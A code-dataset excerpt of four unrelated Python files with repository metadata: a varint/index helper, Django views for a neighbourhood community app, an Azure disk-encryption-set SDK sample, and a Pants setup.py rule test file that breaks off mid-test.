            value &= VI_MASK
            return value, size
        if shift >= VI_BIT_MAX:
            raise InvalidVarint
def read_varint(stream):
    """Decode a varint from *stream*, consuming the bytes it occupies."""
    decoded, consumed = peek_varint(stream)
    stream.read(consumed)
    return decoded
class InvalidProtobufMessage(Exception):
    """Signals a malformed protobuf message (not raised in this module's visible code)."""
    pass
class Index(object):
    """An in-memory collection of peeks, queryable by class and by offset."""

    def __init__(self, iterable):
        # Materialize once so the index can be queried repeatedly.
        self.peeks = list(iterable)

    def __iter__(self):
        return iter(self.peeks)

    def find(self, cls):
        """Return the first peek whose cls matches, or None."""
        return next((peek for peek in self.peeks if peek.cls == cls), None)

    def find_all(self, cls):
        """Iterate over every peek whose cls matches."""
        return (peek for peek in self.peeks if peek.cls == cls)

    def find_behind(self, offset):
        """Iterate over peeks strictly before *offset*."""
        return (peek for peek in self.peeks if peek.offset < offset)

    def find_at(self, offset):
        """Iterate over peeks exactly at *offset*."""
        return (peek for peek in self.peeks if peek.offset == offset)

    def find_ahead(self, offset):
        """Iterate over peeks strictly after *offset*."""
        return (peek for peek in self.peeks if peek.offset > offset)
|
[
"joshua.a.morris@gmail.com"
] |
joshua.a.morris@gmail.com
|
f9911ba1ef369f850f1fe229f1de64f2c3a20c93
|
d49fd2040235f30e5701a997b2afcc4b123b82f1
|
/neighbourhood/views.py
|
513fb809d73e570ef76ba59f7bf262d4e1235690
|
[
"MIT"
] |
permissive
|
ClintonClin/neighbourhood
|
830b9bd0b7e27308b54fedb432877191e6a3585e
|
509ba9702d67e5636aee9d754eaa41e57a52b61a
|
refs/heads/master
| 2022-12-11T08:23:08.690787
| 2019-02-28T10:57:05
| 2019-02-28T10:57:05
| 165,234,843
| 0
| 0
| null | 2022-12-08T03:00:45
| 2019-01-11T11:43:06
|
Python
|
UTF-8
|
Python
| false
| false
| 7,746
|
py
|
from django.shortcuts import render, redirect
from django.http import HttpResponse, Http404, HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from django.core.exceptions import ObjectDoesNotExist
from .models import neighbourhood, healthservices, Business, Health, Authorities, BlogPost, Profile, Notifications, Comment
from .email import send_priority_email
from .forms import notificationsForm, ProfileForm, BlogPostForm, BusinessForm, CommentForm
from decouple import config, Csv
import datetime as dt
from django.http import JsonResponse
import json
from django.db.models import Q
from django.contrib.auth.models import User
from rest_framework.response import Response
from rest_framework.views import APIView
# Create your views here.
def index(request):
    """Landing page: require login, then require an existing profile."""
    try:
        if not request.user.is_authenticated:
            return redirect('/accounts/login/')
        current_user = request.user
        # The fetched profile is not used directly; the lookup exists to raise
        # ObjectDoesNotExist for first-time users so they get redirected to
        # the profile-creation flow below.
        profile = Profile.objects.get(username=current_user)
    except ObjectDoesNotExist:
        return redirect('create-profile')
    return render(request, 'index.html')
@login_required(login_url='/accounts/login/')
def notification(request):
    """List notifications for the signed-in user's neighbourhood."""
    viewer_profile = Profile.objects.get(username=request.user)
    all_notifications = Notifications.objects.filter(neighbourhood=viewer_profile.neighbourhood)
    return render(request, 'notifications.html', {"notifications": all_notifications})
@login_required(login_url='/accounts/login/')
def health(request):
    """List health services available in the user's neighbourhood."""
    viewer_profile = Profile.objects.get(username=request.user)
    healthservices = Health.objects.filter(neighbourhood=viewer_profile.neighbourhood)
    return render(request, 'health.html', {"healthservices": healthservices})
@login_required(login_url='/accounts/login/')
def blog(request):
    """List blog posts written in the user's neighbourhood."""
    viewer_profile = Profile.objects.get(username=request.user)
    blogposts = BlogPost.objects.filter(neighbourhood=viewer_profile.neighbourhood)
    return render(request, 'blog.html', {"blogposts": blogposts})
@login_required(login_url='/accounts/login/')
def businesses(request):
    """List businesses registered in the user's neighbourhood."""
    viewer_profile = Profile.objects.get(username=request.user)
    businesses = Business.objects.filter(neighbourhood=viewer_profile.neighbourhood)
    return render(request, 'business.html', {"businesses": businesses})
@login_required(login_url='/accounts/login/')
def authorities(request):
    """List authority/security contacts for the user's neighbourhood."""
    viewer_profile = Profile.objects.get(username=request.user)
    authorities = Authorities.objects.filter(neighbourhood=viewer_profile.neighbourhood)
    return render(request, 'security.html', {"authorities": authorities})
@login_required(login_url='/accounts/login/')
def view_blog(request, id):
    """Display one blog post with its comments; handle new-comment POSTs.

    Args:
        id: Primary key of the BlogPost to display.
    """
    current_user = request.user
    # BUG FIX: the original bare `except:` swallowed everything, including
    # KeyboardInterrupt/SystemExit. Narrow to Exception while keeping the
    # original fall-back-to-empty behaviour.
    try:
        comments = Comment.objects.filter(post_id=id)
    except Exception:
        comments = []
    blog = BlogPost.objects.get(id=id)
    if request.method == 'POST':
        form = CommentForm(request.POST, request.FILES)
        if form.is_valid():
            comment = form.save(commit=False)
            comment.username = current_user
            comment.post = blog
            comment.save()
            # NOTE(review): consider redirecting after a successful POST
            # (PRG pattern) to avoid duplicate comments on refresh.
    else:
        form = CommentForm()
    return render(request, 'view_blog.html', {"blog": blog, "form": form, "comments": comments})
@login_required(login_url='/accounts/login/')
def user_profile(request, username):
    """Show the public profile page for *username*."""
    account = User.objects.get(username=username)
    profile = Profile.objects.get(username=account)
    return render(request, 'profile.html', {"profile": profile})
@login_required(login_url='/accounts/login/')
def my_profile(request):
    """Show the signed-in user's own profile page."""
    own_profile = Profile.objects.get(username=request.user)
    return render(request, 'user_profile.html', {"profile": own_profile})
@login_required(login_url='/accounts/login/')
def new_blogpost(request):
    """Create a blog post tagged with the author's neighbourhood and avatar."""
    author = request.user
    author_profile = Profile.objects.get(username=author)
    if request.method == "POST":
        form = BlogPostForm(request.POST, request.FILES)
        if form.is_valid():
            new_post = form.save(commit=False)
            new_post.username = author
            new_post.neighbourhood = author_profile.neighbourhood
            new_post.avatar = author_profile.avatar
            new_post.save()
            return HttpResponseRedirect('/blog')
    else:
        form = BlogPostForm()
    return render(request, 'blogpost_form.html', {"form": form})
@login_required(login_url='/accounts/login/')
def new_business(request):
    """Register a business under the owner's neighbourhood."""
    owner = request.user
    owner_profile = Profile.objects.get(username=owner)
    if request.method == "POST":
        form = BusinessForm(request.POST, request.FILES)
        if form.is_valid():
            listing = form.save(commit=False)
            listing.owner = owner
            listing.neighbourhood = owner_profile.neighbourhood
            listing.save()
            return HttpResponseRedirect('/business')
    else:
        form = BusinessForm()
    return render(request, 'business_form.html', {"form": form})
@login_required(login_url='/accounts/login/')
def create_profile(request):
    """Let a freshly registered user create their profile."""
    current_user = request.user
    if request.method == "POST":
        form = ProfileForm(request.POST, request.FILES)
        if form.is_valid():
            new_profile = form.save(commit=False)
            new_profile.username = current_user
            new_profile.save()
            return HttpResponseRedirect('/')
    else:
        form = ProfileForm()
    return render(request, 'profile_form.html', {"form": form})
@login_required(login_url='/accounts/login/')
def new_notification(request):
    """Post a notification to the author's neighbourhood."""
    author = request.user
    author_profile = Profile.objects.get(username=author)
    if request.method == "POST":
        form = notificationsForm(request.POST, request.FILES)
        if form.is_valid():
            new_note = form.save(commit=False)
            new_note.author = author
            new_note.neighbourhood = author_profile.neighbourhood
            new_note.save()
            # NOTE: email fan-out for high-priority notifications
            # (send_priority_email) is currently disabled.
            return HttpResponseRedirect('/notifications')
    else:
        form = notificationsForm()
    return render(request, 'notifications_form.html', {"form": form})
@login_required(login_url='/accounts/login/')
def update_profile(request):
    """Edit the signed-in user's profile.

    On GET, pre-fills the form from the existing profile when one exists,
    otherwise shows a blank form. On valid POST, saves and redirects home.
    """
    current_user = request.user
    if request.method == "POST":
        instance = Profile.objects.get(username=current_user)
        form = ProfileForm(request.POST, request.FILES, instance=instance)
        if form.is_valid():
            profile = form.save(commit=False)
            profile.username = current_user
            profile.save()
            return redirect('Index')
    else:
        # BUG FIX: the original used `elif Profile.objects.get(...)`, which
        # raises Profile.DoesNotExist for users without a profile instead of
        # falling through to the blank form. filter().first() returns None
        # safely.
        existing = Profile.objects.filter(username=current_user).first()
        if existing is not None:
            form = ProfileForm(instance=existing)
        else:
            form = ProfileForm()
    return render(request, 'update_profile.html', {"form": form})
@login_required(login_url='/accounts/login/')
def search_results(request):
    """Search blog posts by the `blog` query parameter."""
    search_term = request.GET.get("blog")
    if search_term:
        searched_blogposts = BlogPost.search_blogpost(search_term)
        message = f"{search_term}"
        print(searched_blogposts)
        return render(request, 'search.html', {"message": message, "blogs": searched_blogposts})
    message = "You haven't searched for anything"
    return render(request, 'search.html', {"message": message})
|
[
"clintonclin00@gmail.com"
] |
clintonclin00@gmail.com
|
70044d57fced0a79461899cfe23e9212aef8c5de
|
1dafc27c7f754f936135ef8614ab291854034022
|
/samples/compute/disable_manage_disk_encryption_set.py
|
2d93c612d3dc60bada457e5fdc07c1f45c83cea8
|
[
"MIT"
] |
permissive
|
ArunAyyagari/azure-samples-python-management
|
6f329b35e71939a5539e164e55097a15c6d7dea6
|
cfe187ce49aad35d84d0a61ba6d3ef156095ff0c
|
refs/heads/master
| 2022-08-29T03:10:47.894017
| 2020-05-25T02:32:18
| 2020-05-25T02:32:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,563
|
py
|
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import os
from dateutil import parser as date_parse
from azure.identity import DefaultAzureCredentials
from azure.keyvault.keys import KeyClient
from azure.mgmt.compute import ComputeManagementClient
from azure.mgmt.keyvault import KeyVaultManagementClient
from azure.mgmt.resource import ResourceManagementClient
def main():
    """Demonstrate the disk-encryption-set lifecycle.

    Creates a key vault and RSA key, then creates, gets, updates, and deletes
    a disk encryption set, and finally deletes the resource group.
    """
    SUBSCRIPTION_ID = os.environ.get("SUBSCRIPTION_ID", None)
    TENANT_ID = os.environ.get("AZURE_TENANT_ID", None)
    DISK_ENCRYPTION_SET_NAME = "diskencryptionsetxxx"
    GROUP_NAME = "testgroupx"
    KEY_VAULT = "keyvaultxyzxxxxx"

    # BUG FIX: azure.identity exposes `DefaultAzureCredential` (no trailing
    # "s"); the module-level import of `DefaultAzureCredentials` raises
    # ImportError and should be corrected to match. Build the credential once
    # and share it across all clients.
    from azure.identity import DefaultAzureCredential
    credential = DefaultAzureCredential()

    # Create client
    # For other authentication approaches, please see: https://pypi.org/project/azure-identity/
    resource_client = ResourceManagementClient(
        credential=credential,
        subscription_id=SUBSCRIPTION_ID
    )
    compute_client = ComputeManagementClient(
        credential=credential,
        subscription_id=SUBSCRIPTION_ID
    )
    # BUG FIX: track-2 management clients take `credential=`, not `credentials=`.
    keyvault_client = KeyVaultManagementClient(
        credential=credential,
        subscription_id=SUBSCRIPTION_ID
    )

    # Create resource group
    resource_client.resource_groups.create_or_update(
        GROUP_NAME,
        {"location": "eastus"}
    )

    # Create a key vault enabled for disk encryption, then an RSA key in it.
    vault = keyvault_client.vaults.create_or_update(
        GROUP_NAME,
        KEY_VAULT,
        {
            'location': "eastus",
            'properties': {
                'sku': {
                    'name': 'standard'
                },
                'tenant_id': TENANT_ID,
                "access_policies": [
                    {
                        "tenant_id": TENANT_ID,
                        "object_id": "123743cc-88ef-49ee-920e-13958fe5697d",
                        "permissions": {
                            "keys": [
                                "encrypt",
                                "decrypt",
                                "wrapKey",
                                "unwrapKey",
                                "sign",
                                "verify",
                                "get",
                                "list",
                                "create",
                                "update",
                                "import",
                                "delete",
                                "backup",
                                "restore",
                                "recover",
                                "purge"
                            ]
                        }
                    }
                ],
                'enabled_for_disk_encryption': True,
            }
        }
    ).result()

    key_client = KeyClient(vault.properties.vault_uri, credential)
    expires_on = date_parse.parse("2050-02-02T08:00:00.000Z")
    key = key_client.create_key(
        "testkey",
        "RSA",
        size=2048,
        expires_on=expires_on
    )

    # Create disk encryption set
    encryption_set = compute_client.disk_encryption_sets.begin_create_or_update(
        GROUP_NAME,
        DISK_ENCRYPTION_SET_NAME,
        {
            "location": "eastus",
            "identity": {
                "type": "SystemAssigned"
            },
            "active_key": {
                "source_vault": {
                    "id": vault.id
                },
                "key_url": key.id
            }
        }
    ).result()
    print("Create disk encryption set:\n{}".format(encryption_set))

    # Get disk encryption set
    encryption_set = compute_client.disk_encryption_sets.get(
        GROUP_NAME,
        DISK_ENCRYPTION_SET_NAME
    )
    print("Get disk encryption set:\n{}".format(encryption_set))

    # Update disk encryption set
    encryption_set = compute_client.disk_encryption_sets.begin_update(
        GROUP_NAME,
        DISK_ENCRYPTION_SET_NAME,
        {
            "active_key": {
                "source_vault": {
                    "id": vault.id
                },
                "key_url": key.id
            },
            "tags": {
                "department": "Development",
                "project": "Encryption"
            }
        }
    ).result()
    print("Update disk encryption set:\n{}".format(encryption_set))

    # Delete disk encryption set
    compute_client.disk_encryption_sets.begin_delete(
        GROUP_NAME,
        DISK_ENCRYPTION_SET_NAME
    )
    print("Delete disk encryption set.\n")

    # Delete Group
    resource_client.resource_groups.begin_delete(
        GROUP_NAME
    ).result()
if __name__ == "__main__":
    # Run the sample end to end when executed directly.
    main()
|
[
"sunkaihuisos@gmail.com"
] |
sunkaihuisos@gmail.com
|
208a1844a81ead0571afc60c1414be53b9b0f78c
|
05352c29e844705f02d65526343eea9b486f8bd7
|
/src/python/pants/backend/python/rules/run_setup_py_test.py
|
001faa56b7b0e7fd0e62305736c4abe5951844de
|
[
"Apache-2.0"
] |
permissive
|
DoN-SultaN/pants
|
af2557de1178faaf73eed0a5a32e8f6fd34d2169
|
5cb5379003a0674c51f9a53f582cf690eddfaf45
|
refs/heads/master
| 2022-10-15T04:18:54.759839
| 2020-06-13T10:04:21
| 2020-06-13T10:04:21
| 272,089,524
| 1
| 0
|
Apache-2.0
| 2020-06-13T21:36:50
| 2020-06-13T21:36:49
| null |
UTF-8
|
Python
| false
| false
| 27,011
|
py
|
# Copyright 2019 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import json
import textwrap
from typing import Iterable, Type
import pytest
from pants.backend.python.python_artifact import PythonArtifact
from pants.backend.python.rules.run_setup_py import (
AmbiguousOwnerError,
AncestorInitPyFiles,
DependencyOwner,
ExportedTarget,
ExportedTargetRequirements,
InvalidEntryPoint,
InvalidSetupPyArgs,
NoOwnerError,
OwnedDependencies,
OwnedDependency,
SetupPyChroot,
SetupPyChrootRequest,
SetupPySources,
SetupPySourcesRequest,
generate_chroot,
get_ancestor_init_py,
get_exporting_owner,
get_owned_dependencies,
get_requirements,
get_sources,
validate_args,
)
from pants.backend.python.target_types import PythonBinary, PythonLibrary, PythonRequirementLibrary
from pants.build_graph.build_file_aliases import BuildFileAliases
from pants.core.target_types import Resources
from pants.core.util_rules.determine_source_files import rules as determine_source_files_rules
from pants.core.util_rules.strip_source_roots import rules as strip_source_roots_rules
from pants.engine.addresses import Address
from pants.engine.fs import Snapshot
from pants.engine.internals.scheduler import ExecutionError
from pants.engine.rules import RootRule
from pants.engine.selectors import Params
from pants.engine.target import Target, Targets, WrappedTarget
from pants.python.python_requirement import PythonRequirement
from pants.source.source_root import SourceRootConfig
from pants.testutil.option.util import create_options_bootstrapper
from pants.testutil.subsystem.util import init_subsystem
from pants.testutil.test_base import TestBase
# Source line the fixtures below write into an __init__.py to mark it as a
# pkg_resources-style namespace package.
_namespace_decl = "__import__('pkg_resources').declare_namespace(__name__)"
class TestSetupPyBase(TestBase):
    """Shared fixtures for the setup_py rule tests below."""

    @classmethod
    def alias_groups(cls) -> BuildFileAliases:
        # Expose the BUILD-file objects (`python_requirement`, `setup_py`)
        # that the test fixtures reference.
        return BuildFileAliases(
            objects={"python_requirement": PythonRequirement, "setup_py": PythonArtifact}
        )

    @classmethod
    def target_types(cls):
        """Target types available to the fixture BUILD files."""
        return [PythonBinary, PythonLibrary, PythonRequirementLibrary, Resources]

    def tgt(self, addr: str) -> Target:
        """Resolve the target at address string *addr*."""
        return self.request_single_product(WrappedTarget, Params(Address.parse(addr))).target
def init_source_root():
    """Initialize SourceRootConfig with `src/python` as the only source root."""
    init_subsystem(SourceRootConfig, options={"source": {"root_patterns": ["src/python"]}})
class TestGenerateChroot(TestSetupPyBase):
    """Tests for generate_chroot: assembling the setup.py chroot contents."""

    @classmethod
    def rules(cls):
        # Register the full rule chain needed to build a chroot.
        return super().rules() + [
            generate_chroot,
            get_sources,
            get_requirements,
            get_ancestor_init_py,
            get_owned_dependencies,
            get_exporting_owner,
            RootRule(SetupPyChrootRequest),
            *determine_source_files_rules(),
            *strip_source_roots_rules(),
        ]

    def assert_chroot(self, expected_files, expected_setup_kwargs, addr):
        """Assert the chroot built for *addr* has the given files and setup kwargs."""
        chroot = self.request_single_product(
            SetupPyChroot,
            Params(
                SetupPyChrootRequest(ExportedTarget(self.tgt(addr)), py2=False),
                create_options_bootstrapper(args=["--source-root-patterns=src/python"]),
            ),
        )
        snapshot = self.request_single_product(Snapshot, Params(chroot.digest))
        assert sorted(expected_files) == sorted(snapshot.files)
        kwargs = json.loads(chroot.setup_keywords_json)
        assert expected_setup_kwargs == kwargs

    def assert_error(self, addr: str, exc_cls: Type[Exception]):
        """Assert that building the chroot for *addr* fails with *exc_cls*."""
        with pytest.raises(ExecutionError) as excinfo:
            self.request_single_product(
                SetupPyChroot,
                Params(
                    SetupPyChrootRequest(ExportedTarget(self.tgt(addr)), py2=False),
                    create_options_bootstrapper(args=["--source-root-patterns=src/python"]),
                ),
            )
        ex = excinfo.value
        assert len(ex.wrapped_exceptions) == 1
        assert type(ex.wrapped_exceptions[0]) == exc_cls

    def test_generate_chroot(self) -> None:
        """End-to-end: sources, resources, binaries, and dep requirements land in the chroot."""
        init_source_root()
        self.create_file(
            "src/python/foo/bar/baz/BUILD",
            "python_library(provides=setup_py(name='baz', version='1.1.1'))",
        )
        self.create_file("src/python/foo/bar/baz/baz.py", "")
        self.create_file(
            "src/python/foo/qux/BUILD",
            textwrap.dedent(
                """
                python_library()
                python_binary(name="bin", entry_point="foo.qux.bin")
                """
            ),
        )
        self.create_file("src/python/foo/qux/__init__.py", "")
        self.create_file("src/python/foo/qux/qux.py", "")
        self.create_file("src/python/foo/resources/BUILD", 'resources(sources=["js/code.js"])')
        self.create_file("src/python/foo/resources/js/code.js", "")
        self.create_file(
            "src/python/foo/BUILD",
            textwrap.dedent(
                """
                python_library(
                    dependencies=[
                        'src/python/foo/bar/baz',
                        'src/python/foo/qux',
                        'src/python/foo/resources',
                    ],
                    provides=setup_py(
                        name='foo', version='1.2.3'
                    ).with_binaries(
                        foo_main='src/python/foo/qux:bin'
                    )
                )
                """
            ),
        )
        self.create_file("src/python/foo/__init__.py", _namespace_decl)
        self.create_file("src/python/foo/foo.py", "")
        self.assert_chroot(
            [
                "src/foo/qux/__init__.py",
                "src/foo/qux/qux.py",
                "src/foo/resources/js/code.js",
                "src/foo/__init__.py",
                "src/foo/foo.py",
                "setup.py",
                "MANIFEST.in",
            ],
            {
                "name": "foo",
                "version": "1.2.3",
                "package_dir": {"": "src"},
                "packages": ["foo", "foo.qux"],
                "namespace_packages": ["foo"],
                "package_data": {"foo": ["resources/js/code.js"]},
                "install_requires": ["baz==1.1.1"],
                "entry_points": {"console_scripts": ["foo_main=foo.qux.bin"]},
            },
            "src/python/foo",
        )

    def test_invalid_binary(self) -> None:
        """with_binaries must point at python_binary targets that define an entry point."""
        init_source_root()
        self.create_file(
            "src/python/invalid_binary/BUILD",
            textwrap.dedent(
                """
                python_library(name='not_a_binary', sources=[])
                python_binary(name='no_entrypoint')
                python_library(
                    name='invalid_bin1',
                    sources=[],
                    provides=setup_py(
                        name='invalid_bin1', version='1.1.1'
                    ).with_binaries(foo=':not_a_binary')
                )
                python_library(
                    name='invalid_bin2',
                    sources=[],
                    provides=setup_py(
                        name='invalid_bin2', version='1.1.1'
                    ).with_binaries(foo=':no_entrypoint')
                )
                """
            ),
        )
        self.assert_error("src/python/invalid_binary:invalid_bin1", InvalidEntryPoint)
        self.assert_error("src/python/invalid_binary:invalid_bin2", InvalidEntryPoint)
class TestGetSources(TestSetupPyBase):
    """Tests for get_sources: collecting files, packages, and package data."""

    @classmethod
    def rules(cls):
        return super().rules() + [
            get_sources,
            get_ancestor_init_py,
            RootRule(SetupPySourcesRequest),
            RootRule(SourceRootConfig),
            *determine_source_files_rules(),
            *strip_source_roots_rules(),
        ]

    def assert_sources(
        self,
        expected_files,
        expected_packages,
        expected_namespace_packages,
        expected_package_data,
        addrs,
    ):
        """Assert the computed sources for *addrs* match all expectations."""
        srcs = self.request_single_product(
            SetupPySources,
            Params(
                SetupPySourcesRequest(Targets([self.tgt(addr) for addr in addrs]), py2=False),
                SourceRootConfig.global_instance(),
            ),
        )
        chroot_snapshot = self.request_single_product(Snapshot, Params(srcs.digest))
        assert sorted(expected_files) == sorted(chroot_snapshot.files)
        assert sorted(expected_packages) == sorted(srcs.packages)
        assert sorted(expected_namespace_packages) == sorted(srcs.namespace_packages)
        assert expected_package_data == dict(srcs.package_data)

    def test_get_sources(self) -> None:
        """Sources, ancestor __init__.py files, namespace packages, and resources."""
        init_source_root()
        self.create_file(
            "src/python/foo/bar/baz/BUILD",
            textwrap.dedent(
                """
                python_library(name='baz1', sources=['baz1.py'])
                python_library(name='baz2', sources=['baz2.py'])
                """
            ),
        )
        self.create_file("src/python/foo/bar/baz/baz1.py", "")
        self.create_file("src/python/foo/bar/baz/baz2.py", "")
        self.create_file("src/python/foo/bar/__init__.py", _namespace_decl)
        self.create_file("src/python/foo/qux/BUILD", "python_library()")
        self.create_file("src/python/foo/qux/__init__.py", "")
        self.create_file("src/python/foo/qux/qux.py", "")
        self.create_file("src/python/foo/resources/BUILD", 'resources(sources=["js/code.js"])')
        self.create_file("src/python/foo/resources/js/code.js", "")
        self.create_file("src/python/foo/__init__.py", "")
        self.assert_sources(
            expected_files=["foo/bar/baz/baz1.py", "foo/bar/__init__.py", "foo/__init__.py"],
            expected_packages=["foo", "foo.bar", "foo.bar.baz"],
            expected_namespace_packages=["foo.bar"],
            expected_package_data={},
            addrs=["src/python/foo/bar/baz:baz1"],
        )
        self.assert_sources(
            expected_files=["foo/bar/baz/baz2.py", "foo/bar/__init__.py", "foo/__init__.py"],
            expected_packages=["foo", "foo.bar", "foo.bar.baz"],
            expected_namespace_packages=["foo.bar"],
            expected_package_data={},
            addrs=["src/python/foo/bar/baz:baz2"],
        )
        self.assert_sources(
            expected_files=["foo/qux/qux.py", "foo/qux/__init__.py", "foo/__init__.py"],
            expected_packages=["foo", "foo.qux"],
            expected_namespace_packages=[],
            expected_package_data={},
            addrs=["src/python/foo/qux"],
        )
        self.assert_sources(
            expected_files=[
                "foo/bar/baz/baz1.py",
                "foo/bar/__init__.py",
                "foo/qux/qux.py",
                "foo/qux/__init__.py",
                "foo/__init__.py",
                "foo/resources/js/code.js",
            ],
            expected_packages=["foo", "foo.bar", "foo.bar.baz", "foo.qux"],
            expected_namespace_packages=["foo.bar"],
            expected_package_data={"foo": ("resources/js/code.js",)},
            addrs=["src/python/foo/bar/baz:baz1", "src/python/foo/qux", "src/python/foo/resources"],
        )
        self.assert_sources(
            expected_files=[
                "foo/bar/baz/baz1.py",
                "foo/bar/baz/baz2.py",
                "foo/bar/__init__.py",
                "foo/qux/qux.py",
                "foo/qux/__init__.py",
                "foo/__init__.py",
                "foo/resources/js/code.js",
            ],
            expected_packages=["foo", "foo.bar", "foo.bar.baz", "foo.qux"],
            expected_namespace_packages=["foo.bar"],
            expected_package_data={"foo": ("resources/js/code.js",)},
            addrs=[
                "src/python/foo/bar/baz:baz1",
                "src/python/foo/bar/baz:baz2",
                "src/python/foo/qux",
                "src/python/foo/resources",
            ],
        )
class TestGetRequirements(TestSetupPyBase):
    """Tests for get_requirements: third-party and exported-dep requirement strings."""

    @classmethod
    def rules(cls):
        return super().rules() + [
            get_requirements,
            get_owned_dependencies,
            get_exporting_owner,
            RootRule(DependencyOwner),
        ]

    def assert_requirements(self, expected_req_strs, addr):
        """Assert the computed install_requires for the exported target at *addr*."""
        reqs = self.request_single_product(
            ExportedTargetRequirements,
            Params(DependencyOwner(ExportedTarget(self.tgt(addr))), create_options_bootstrapper()),
        )
        assert sorted(expected_req_strs) == list(reqs)

    def test_get_requirements(self) -> None:
        """3rdparty deps become pinned requirements; exported deps become name==version."""
        self.create_file(
            "3rdparty/BUILD",
            textwrap.dedent(
                """
                python_requirement_library(
                    name='ext1',
                    requirements=[python_requirement('ext1==1.22.333')],
                )
                python_requirement_library(
                    name='ext2',
                    requirements=[python_requirement('ext2==4.5.6')],
                )
                python_requirement_library(
                    name='ext3',
                    requirements=[python_requirement('ext3==0.0.1')],
                )
                """
            ),
        )
        self.create_file(
            "src/python/foo/bar/baz/BUILD",
            "python_library(dependencies=['3rdparty:ext1'], sources=[])",
        )
        self.create_file(
            "src/python/foo/bar/qux/BUILD",
            "python_library(dependencies=['3rdparty:ext2', 'src/python/foo/bar/baz'], sources=[])",
        )
        self.create_file(
            "src/python/foo/bar/BUILD",
            textwrap.dedent(
                """
                python_library(
                    sources=[],
                    dependencies=['src/python/foo/bar/baz', 'src/python/foo/bar/qux'],
                    provides=setup_py(name='bar', version='9.8.7'),
                )
                """
            ),
        )
        self.create_file(
            "src/python/foo/corge/BUILD",
            textwrap.dedent(
                """
                python_library(
                    sources=[],
                    dependencies=['3rdparty:ext3', 'src/python/foo/bar'],
                    provides=setup_py(name='corge', version='2.2.2'),
                )
                """
            ),
        )
        self.assert_requirements(["ext1==1.22.333", "ext2==4.5.6"], "src/python/foo/bar")
        self.assert_requirements(["ext3==0.0.1", "bar==9.8.7"], "src/python/foo/corge")
class TestGetAncestorInitPy(TestSetupPyBase):
    """Tests for get_ancestor_init_py: pulling in __init__.py files above sources."""

    @classmethod
    def rules(cls):
        return super().rules() + [
            get_ancestor_init_py,
            RootRule(Targets),
            RootRule(SourceRootConfig),
            *determine_source_files_rules(),
        ]

    def assert_ancestor_init_py(
        self, expected_init_pys: Iterable[str], addrs: Iterable[str]
    ) -> None:
        """Assert exactly *expected_init_pys* are found for the targets at *addrs*."""
        ancestor_init_py_files = self.request_single_product(
            AncestorInitPyFiles,
            Params(
                Targets([self.tgt(addr) for addr in addrs]), SourceRootConfig.global_instance(),
            ),
        )
        snapshots = [
            self.request_single_product(Snapshot, Params(digest))
            for digest in ancestor_init_py_files.digests
        ]
        init_py_files_found = set([file for snapshot in snapshots for file in snapshot.files])
        # NB: Doesn't include the root __init__.py or the missing src/python/foo/bar/__init__.py.
        assert sorted(expected_init_pys) == sorted(init_py_files_found)

    def test_get_ancestor_init_py(self) -> None:
        """Owned, unowned, missing, and stray __init__.py files are handled correctly."""
        init_source_root()
        # NB: src/python/foo/bar/baz/qux/__init__.py is a target's source.
        self.create_file("src/python/foo/bar/baz/qux/BUILD", "python_library()")
        self.create_file("src/python/foo/bar/baz/qux/qux.py", "")
        self.create_file("src/python/foo/bar/baz/qux/__init__.py", "")
        self.create_file("src/python/foo/bar/baz/__init__.py", "")
        # NB: No src/python/foo/bar/__init__.py.
        # NB: src/python/foo/corge/__init__.py is not any target's source.
        self.create_file("src/python/foo/corge/BUILD", 'python_library(sources=["corge.py"])')
        self.create_file("src/python/foo/corge/corge.py", "")
        self.create_file("src/python/foo/corge/__init__.py", "")
        self.create_file("src/python/foo/__init__.py", "")
        self.create_file("src/python/__init__.py", "")
        self.create_file("src/python/foo/resources/BUILD", 'resources(sources=["style.css"])')
        self.create_file("src/python/foo/resources/style.css", "")
        # NB: A stray __init__.py in a resources-only dir.
        self.create_file("src/python/foo/resources/__init__.py", "")
        # NB: None of these should include the root src/python/__init__.py, the missing
        # src/python/foo/bar/__init__.py, or the stray src/python/foo/resources/__init__.py.
        self.assert_ancestor_init_py(
            ["foo/bar/baz/qux/__init__.py", "foo/bar/baz/__init__.py", "foo/__init__.py"],
            ["src/python/foo/bar/baz/qux"],
        )
        self.assert_ancestor_init_py([], ["src/python/foo/resources"])
        self.assert_ancestor_init_py(
            ["foo/corge/__init__.py", "foo/__init__.py"],
            ["src/python/foo/corge", "src/python/foo/resources"],
        )
        self.assert_ancestor_init_py(
            [
                "foo/bar/baz/qux/__init__.py",
                "foo/bar/baz/__init__.py",
                "foo/corge/__init__.py",
                "foo/__init__.py",
            ],
            ["src/python/foo/bar/baz/qux", "src/python/foo/corge"],
        )
class TestGetOwnedDependencies(TestSetupPyBase):
    """Tests for get_owned_dependencies: which targets an exported target owns."""

    @classmethod
    def rules(cls):
        return super().rules() + [
            get_owned_dependencies,
            get_exporting_owner,
            RootRule(DependencyOwner),
        ]

    def assert_owned(self, owned: Iterable[str], exported: str):
        """Assert that the exported target at *exported* owns exactly *owned*."""
        assert sorted(owned) == sorted(
            od.target.address.reference()
            for od in self.request_single_product(
                OwnedDependencies,
                Params(
                    DependencyOwner(ExportedTarget(self.tgt(exported))),
                    create_options_bootstrapper(),
                ),
            )
        )

    def test_owned_dependencies(self) -> None:
        """Ownership follows the dependency graph, stopping at other exported targets."""
        self.create_file(
            "src/python/foo/bar/baz/BUILD",
            textwrap.dedent(
                """
                python_library(name='baz1', sources=[])
                python_library(name='baz2', sources=[])
                """
            ),
        )
        self.create_file(
            "src/python/foo/bar/BUILD",
            textwrap.dedent(
                """
                python_library(
                    name='bar1',
                    sources=[],
                    dependencies=['src/python/foo/bar/baz:baz1'],
                    provides=setup_py(name='bar1', version='1.1.1'),
                )
                python_library(
                    name='bar2',
                    sources=[],
                    dependencies=[':bar-resources', 'src/python/foo/bar/baz:baz2'],
                )
                resources(name='bar-resources', sources=[])
                """
            ),
        )
        self.create_file(
            "src/python/foo/BUILD",
            textwrap.dedent(
                """
                python_library(
                    name='foo',
                    sources=[],
                    dependencies=['src/python/foo/bar:bar1', 'src/python/foo/bar:bar2'],
                    provides=setup_py(name='foo', version='3.4.5'),
                )
                """
            ),
        )
        self.assert_owned(
